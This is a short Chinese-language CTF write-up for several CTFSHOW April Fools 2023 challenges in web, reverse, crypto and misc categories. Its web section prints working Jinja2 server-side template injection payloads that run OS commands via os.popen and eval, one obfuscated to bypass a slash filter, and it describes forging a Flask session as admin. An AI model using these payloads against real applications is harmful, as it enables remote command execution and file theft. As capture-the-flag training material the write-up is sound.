CTFSHOW愚人杯2023 部分wp
web
easy_signin
url是base64編碼后的文件名
直接讀個index.php
然后查看源碼 解碼base64
easy_ssti
過濾了斜杠,不能訪問根目錄了,考慮手動拼接一個{{lipsum.__globals__.os.popen(lipsum.__globals__.__str__().__getitem__(34)~lipsum.__globals__.__str__().__getitem__(5)~lipsum.__globals__.__str__().__getitem__(22)~lipsum.__globals__.__str__().__getitem__(139)~lipsum.__globals__.__str__().__getitem__(288)~lipsum.__globals__.__str__().__getitem__(87)~lipsum.__globals__.__str__().__getitem__(24)~lipsum.__globals__.__str__().__getitem__(5)~lipsum.__globals__.__str__().__getitem__(54)).read()}}
easy_flask
session偽造
偽造成admin登錄后可以任意文件下載
下個app.py看源碼
hello路由下存在ssti
可以tplmap一把梭
手動擋payload如下
request.__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat /*").read()')
re
easy_pyc
反編譯得到py源碼
uncompyle6 -o a.py xxx.pyccrypto
easy_base
簽到 解碼base64即可
misc
奇怪的壓縮包
09改00然后bandzip修復
crc爆破寬高
修改高度為300
Ocr識別得到
5oSa5Lq66lqC5b+r5LmQ77yB77yB77yB解base64可以得到類似愚人節快樂的字符串
沒什么用
Binwalk抽下圖
發現里面還有一個壓縮包
010打開
在最后發現key的base64編碼后的值,解碼得到yurenjie
解壓得到圖片
crc 完了ocr
琴柳感
觀察發現除去開頭和結尾獨立的兩句話 一共來回四句話
猜測四進制
四位一組要想能解出字母第一位必是1 因為4^3 =64
那么所有的你有沒有感受到城市在分崩離析?替換為1,另外三局遍歷替換
最終得到的四進制的字符串
總結
以上是生活随笔為你收集整理的CTFSHOW愚人杯2023 部分wp的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 拼多多引流大法,日引百人太简单
- 下一篇: 关于中台的深度思考和中台实战